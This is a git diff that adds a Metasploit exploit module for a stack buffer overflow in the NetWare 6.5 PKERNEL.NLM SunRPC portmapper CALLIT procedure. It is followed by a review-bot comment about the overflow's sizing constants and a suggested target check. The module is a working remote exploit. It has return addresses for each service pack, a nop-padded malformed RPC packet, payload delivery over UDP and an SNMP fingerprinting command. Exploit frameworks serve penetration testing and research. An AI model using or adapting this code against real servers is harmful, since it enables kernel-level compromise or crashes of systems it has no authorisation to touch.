diff --git a/modules/exploits/netware/sunrpc/pkernel_callit.rb b/modules/exploits/netware/sunrpc/pkernel_callit.rb
new file mode 100755
index 0000000000..7a4dd5878d
--- /dev/null
+++ b/modules/exploits/netware/sunrpc/pkernel_callit.rb
@@ -0,0 +1,92 @@
+##
+ # NetWare 6.5 NFS - Portmapper and RPC Module Buffer Overflow (CALLIT procedure)
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+
+ include Msf::Exploit::Remote::Udp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure.
+ PKERNEL.NLM is installed by default on all NetWare servers to support NFS.
+ The PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can
+ cause the operating system to reboot.
+ },
+ 'Author' => [ 'pahtzo', ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ # There is no CVE for this vulnerability
+ [ 'BID', '36564' ],
+ [ 'OSVDB', '58447' ],
+ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-067/' ],
+ ],
+ 'Privileged' => true,
+ 'Payload' =>
+ {
+ 'Space' => 2020,
+ },
+ 'Platform' => 'netware',
+ 'Targets' =>
+ [
+ # NetWare SP and PKERNEL.NLM version can be found in SNMP:
+ # snmpwalk -Os -c public -v 1 [target hostname] | egrep -i "sysdescr|pkernel.nlm"
+ # sysDescr.0 = STRING: Novell NetWare 5.70.08 October 3, 2008
+ # hrSWRunName.1191394992 = STRING: "PKERNEL.NLM v15.01 (20081014)"
+ [ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm)
+ [ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm)
+ [ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm)
+ [ 'NetWare 6.5 SP5', { 'Ret' => 0xbabc9c3c } ], # push esp - ret (libc.nlm)
+ [ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm)
+ [ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm)
+ [ 'NetWare 6.5 SP8', { 'Ret' => 0x823C870C } ], # push esp - ret (libc.nlm)
+ ],
+
+ 'DisclosureDate' => 'Oct 01 2009'))
+
+ register_options([Opt::RPORT(111)], self.class)
+ end
+
+ def exploit
+ connect_udp
+
+ buf = [rand(0xffffffff)].pack('N') # XID
+ buf << [0].pack('N') # Message Type: Call (0)
+ buf << [2].pack('N') # RPC Version: 2
+ buf << [100000].pack('N') # Program: Portmap (100000)
+ buf << [2].pack('N') # Program Version: 2
+ buf << [5].pack('N') # Procedure: CALLIT (5)
+ buf << [0].pack('N') # Credentials AUTH_NULL (0)
+ buf << [0].pack('N') # Length: 0
+ buf << [0].pack('N') # Verifier AUTH_NULL (0)
+ buf << [0].pack('N') # Length: 0
+ buf << [0].pack('N') # Program: Unknown (0)
+ buf << [1].pack('N') # Version: 1
+ buf << [1].pack('N') # Procedure: proc-1 (1)
+ buf << [4097].pack('N') # Arguments: length: 4097
+
+ buf << make_nops(2072) # fill to ret
+ buf << [target.ret].pack('V') # addr. of push esp - ret
+ buf << payload.encoded #
+
+# print_status("payload space #{payload_space()}...")
+# print_status("payload len #{payload.encoded.length}...")
+# print_status("total buf len #{buf.length}...")
+
+ print_status("Trying target #{target.name}...")
+
+ udp_sock.put(buf)
+ handler
+ disconnect_udp
+ end
+
+end
+
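Review bot: The three constants that shape the overflow in `exploit` — `'Space' => 2020`, `make_nops(2072)` and the XDR argument length `4097` — are coupled but nothing in the hunk says so: the bytes actually appended after the length field are 2072 nops + 4 bytes of `target.ret` + at most 2020 bytes of payload, i.e. at most 4096, one short of the declared 4097, and whether that mismatch is deliberate (the thing that pushes the CALLIT copy past its buffer) or an off-by-one cannot be told from the code. A comment on the `[4097].pack('N')` line such as `# declared arg length 4097; 2072 nops + 4 (ret) + Space (2020) = 4096 bytes follow - keep all three in sync` would stop the next maintainer from raising Space on its own. Because the description warns that a missed `Ret` reboots a kernel-mode NLM, the module would also benefit from a `check` method built on the SNMP `sysDescr`/`hrSWRunName` fingerprint the target comments already document, so the SP-specific return address can be validated before a datagram is sent. The hunk is the whole new file, so nothing lies outside it.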